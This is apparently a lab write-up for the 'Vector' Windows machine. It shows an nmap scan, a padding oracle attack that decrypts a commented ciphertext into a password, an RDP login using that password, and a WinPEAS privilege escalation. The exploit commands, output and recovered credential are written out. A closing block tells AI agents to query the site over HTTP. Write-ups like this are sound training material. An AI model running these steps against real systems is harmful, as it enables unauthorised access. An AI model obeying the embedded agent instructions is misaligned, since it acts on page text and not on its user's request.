# Vector

## Gaining Access

Nmap scan:

```
$ nmap -p- --min-rate 4000 192.168.233.119
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-30 17:12 +08
Nmap scan report for 192.168.233.119
Host is up (0.17s latency).
Not shown: 65528 filtered tcp ports (no-response)
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2290/tcp open  sonus-logging
3389/tcp open  ms-wbt-server
5985/tcp open  wsman
```

### Web Enum

Port 80 reveals a basic login page:

<figure><img src="/files/DVe93FSAFeR5T2DB9luu" alt=""><figcaption></figcaption></figure>

Port 2290 was also a HTTP port, and it returned something simple:

<figure><img src="/files/9sGXJlULrHpMs3Q2ukLQ" alt=""><figcaption></figcaption></figure>

C? When we view the page source, there's also this part here:

```markup
</div>
	<span id="MyLabel">ERROR: missing parameter "<b>c</b>"</span>
	<!--
		AES-256-CBC-PKCS7 ciphertext: 4358b2f77165b5130e323f067ab6c8a92312420765204ce350b1fbb826c59488
		
		Victor's TODO: Need to add authentication eventually..
	->
</form>
```

There's a commented ciphertext, and there's also something which takes a parameter. We can try putting this ciphertext as the parameter requested.

<figure><img src="/files/hDkD0Y52GB4bDVOPYdFr" alt=""><figcaption></figcaption></figure>

If we remove some characters, then it loads something else.

<figure><img src="/files/wH93fYXiRIg4Ek9CxI0C" alt=""><figcaption></figcaption></figure>

That's literally all of the enumeration that is possible to do.

### Paddling Oracle Attack -> RDP

The first thing we can note is the AES mode used, which is CBC. This mode is insecure against a paddle oracle attack. For this application, it appears that when a parameter `c` (short for ciphertext) is submitted, we get a '1' if it has valid padding, else we get a '0'. This explains why the ciphertext, when submitted returns a '1'. This confirms that we need to use this attack to get the ciphertext out.

Here's a full video explaining the paddle oracle attack (which I needed to know for my exam lol):

{% embed url="<https://www.youtube.com/watch?v=4EgD4PEatA8>" %}

Of course, to exploit this we will leverage on automated methods since it involves brute forcing each byte of the ciphertext. Tools like `padbuster` also work if configured properly, but I opted to use the script from this repo since it was easier to configure:

{% embed url="<https://github.com/mpgn/Padding-oracle-attack>" %}

{% code overflow="wrap" %}

```bash
$ python3 exploit.py -c 4358b2f77165b5130e323f067ab6c8a92312420765204ce350b1fbb826c59488 -l 16 --host 192.168.233.119:2290 -u /?c= --error '<span id="MyLabel">0</span>' --method GET
```

{% endcode %}

This would brute force every single character out. Here's the output of it:

```
[+] Search value block :  1 

[+] Found 1 bytes : 04

[+] Found 2 bytes : 0404

[+] Found 3 bytes : 040404

[+] Found 4 bytes : 04040404

[+] Found 5 bytes : 3704040404

[+] Found 6 bytes : 743704040404

[+] Found 7 bytes : 61743704040404

[+] Found 8 bytes : 5661743704040404

[+] Found 9 bytes : 655661743704040404

[+] Found 10 bytes : 6f655661743704040404

[+] Found 11 bytes : 6c6f655661743704040404

[+] Found 12 bytes : 416c6f655661743704040404

[+] Found 13 bytes : 6d416c6f655661743704040404

[+] Found 14 bytes : 726d416c6f655661743704040404

[+] Found 15 bytes : 6f726d416c6f655661743704040404

[+] Found 16 bytes : 576f726d416c6f655661743704040404


[+] Decrypted value (HEX): 576F726D416C6F655661743704040404
[+] Decrypted value (ASCII): WormAloeVat7
```

We get a password! SSH is not open on the machine, but RDP is. `xfreerdp` can be used to connect to it.

```
$ xfreerdp /u:victor /p:WormAloeVat7 /v:192.168.233.119
```

<figure><img src="/files/AT11lKUCqnIB9sFjdEo7" alt=""><figcaption></figcaption></figure>

We can then grab the user flag.

## Privilege Escalation

### WinPEAS -> Admin Shell

I downloaded and ran `winPEASx64.exe` on the machine, and found this output:

<figure><img src="/files/E8uIWRsrERbzAjxLY7WX" alt=""><figcaption></figcaption></figure>

It's pretty trivial to get an administrator shell from this.

<figure><img src="/files/qlFgehMftKm2jlBC7SUe" alt=""><figcaption></figcaption></figure>

Rooted!


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rouvin.gitbook.io/ibreakstuff/writeups/proving-grounds-practice/windows/vector.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.